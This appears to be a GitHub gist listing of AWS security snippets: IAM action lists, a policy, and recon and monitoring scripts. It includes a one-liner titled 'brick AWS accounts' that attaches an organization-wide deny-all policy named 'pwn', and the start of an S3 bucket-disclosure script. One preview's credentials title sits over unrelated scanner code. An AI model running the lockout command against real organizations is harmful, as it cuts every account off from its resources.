iann0036
/ gist:b473bbb3097c5f4c656ed3d07b4d2222
Last active
November 14, 2025 12:59
List of expensive / long-term effect AWS IAM actions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| acm-pca:CreateCertificateAuthority | |
| aws-marketplace:AcceptAgreementApprovalRequest | |
| aws-marketplace:Subscribe | |
| backup:PutBackupVaultLockConfiguration | |
| bedrock:CreateProvisionedModelThroughput | |
| bedrock:UpdateProvisionedModelThroughput | |
| devicefarm:PurchaseOffering | |
| dynamodb:PurchaseReservedCapacityOfferings | |
| ec2:ModifyReservedInstances | |
| ec2:PurchaseCapacityBlock |
noamsdahan
/ passrole_actions_and_parameters.csv
Last active
August 26, 2025 21:57
A list of IAM actions which require iam:PassRole as of December 2020. Nested parameters are written with dot ('.') notation. Where there are multiple relevant parameters, they are separated by the pipe character ('|'). consult the AWS documentation on special cases - noted with an asterisk (most of them are "array of documents" type parameters).…
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| IAM Permission | Params | |
|---|---|---|
| amplify:CreateApp | iamServiceRoleArn | |
| amplify:UpdateApp | iamServiceRoleArn | |
| appconfig:CreateConfigurationProfile | RetrievalRoleArn | |
| appconfig:UpdateConfigurationProfile | RetrievalRoleArn | |
| appflow:CreateConnectorProfile | connectorProfileConfig.connectorProfileProperties.Redshift.roleArn | |
| appflow:UpdateConnectorProfile | connectorProfileConfig.connectorProfileProperties.Redshift.roleArn | |
| application-autoscaling:RegisterScalableTarget | RoleARN | |
| apprunner:CreateService | SourceConfiguration.AuthenticationConfiguration.AccessRoleArn|InstanceConfiguration.InstanceRoleArn | |
| apprunner:UpdateService | SourceConfiguration.AuthenticationConfiguration.AccessRoleArn|InstanceConfiguration.InstanceRoleArn |
kmcquade
/ brick-aws.sh
Last active
September 26, 2023 22:52
One-liner to brick AWS accounts from the Master Payer
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws organizations attach-policy \ | |
| --policy-id $(aws organizations create-policy --name pwn \ | |
| --type SERVICE_CONTROL_POLICY \ | |
| --description "pwn" | |
| --content '{"Version": "2012-10-17","Statement": [{"Effect": "Deny", "Action": "*", "Resource": "*"}]}' \ | |
| | jq ".Policy.PolicySummary.Id"\ | |
| ) \ | |
| --target-id $(aws organizations list-roots | jq ".Roots | .[0].Id") |
kmcquade
/ PreventMarketplaceImages.json
Last active
October 27, 2021 14:19
Testing this out with AWS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "2012-10-17", | |
| "Statement": [ | |
| { | |
| "Sid": "VisualEditor0", | |
| "Effect": "Deny", | |
| "Action": "ec2:RunInstances", | |
| "Resource": "arn:aws:ec2:*::image/ami-*", | |
| "Condition": { | |
| "StringNotEquals": { |
kmcquade
/ AWS API calls that return credentials.md
Last active
November 17, 2025 04:10
AWS API calls that return credentials
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import glob | |
| import plistlib | |
| import sys | |
| import xml | |
| import requests | |
| class VulnScanner(object): | |
| def __init__(self): | |
| self.url = 'https://vulmon.com/scannerapi?product={0}&version={1}&dev=1' |
igama
/ binaryedge-daily-check.py
Created
February 28, 2019 20:38
Get a daily update of the IPS, Networks, ASNs you are interested in using BinaryEdge data.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Example Script | |
| # Get a daily update of what you are interested in. | |
| # What was detected in the last 24hours | |
| # | |
| # For detail on the fields for each message type please check https://docs.binaryedge.io/modules/ | |
| from pybinaryedge import BinaryEdge | |
| import math |
0xdabbad00
/ extract.py
Last active
March 22, 2021 23:37
Parse IAM info from https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_actions-resources-contextkeys.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from os import listdir | |
| from os.path import isfile, join | |
| import re | |
| import json | |
| from bs4 import BeautifulSoup | |
| """ |
0xdabbad00
/ aws actions
Created
August 3, 2018 17:10
AWS API calls as extracted from boto using the technique on https://github.com/duo-labs/cloudtracker#aws_actionstxt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| a4b:AssociateContactWithAddressBook | |
| a4b:AssociateDeviceWithRoom | |
| a4b:AssociateSkillGroupWithRoom | |
| a4b:CreateAddressBook | |
| a4b:CreateContact | |
| a4b:CreateProfile | |
| a4b:CreateRoom | |
| a4b:CreateSkillGroup | |
| a4b:CreateUser | |
| a4b:DeleteAddressBook |
fransr
/ bucket-disclose.sh
Last active
November 7, 2025 17:35
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |